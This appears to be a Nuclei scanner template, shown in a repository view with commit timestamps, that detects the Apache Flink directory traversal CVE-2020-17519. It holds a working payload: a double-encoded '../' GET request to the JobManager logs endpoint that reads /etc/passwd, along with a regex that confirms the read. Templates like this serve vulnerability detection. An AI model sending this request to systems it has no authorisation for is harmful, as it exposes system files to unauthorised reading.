nuclei-templates/cves/2020/CVE-2020-17519.yaml

29 lines
918 B
YAML
Raw Normal View History

2021-01-06 07:08:41 +00:00
id: CVE-2020-17519
info:
name: Apache Flink directory traversal
2021-04-06 06:46:11 +00:00
author: pdteam
2021-01-06 07:08:41 +00:00
severity: high
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
reference: https://github.com/B1anda0/CVE-2020-17519
2021-03-18 07:54:36 +00:00
tags: cve,cve2020,apache,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-17519
cwe-id: CWE-552
2021-01-06 07:08:41 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-01-06 07:08:41 +00:00
part: body